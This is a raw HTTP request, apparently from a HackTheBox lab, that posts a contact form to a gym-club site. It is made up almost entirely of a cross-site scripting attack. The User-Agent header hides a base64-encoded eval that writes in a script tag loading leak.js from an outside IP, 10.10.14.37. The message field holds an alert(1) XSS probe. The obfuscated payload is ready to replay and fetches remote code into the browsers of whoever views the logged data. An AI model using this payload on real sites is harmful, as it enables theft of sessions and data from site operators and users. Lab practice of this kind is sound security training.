POST /blog-single.php HTTP/1.1
Host: gym-club.crossfit.htb
User-Agent: <script>eval(atob("ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPSJodHRwOi8vMTAuMTAuMTQuMzcvbGVhay5qcyI+PC9zY3JpcHQ+Jyk7"))</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://gym-club.crossfit.htb/blog-single.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Connection: close
Upgrade-Insecure-Requests: 1

name=test&email=test%40test.com&phone=test&message=<script>alert(1)</script>&submit=submit
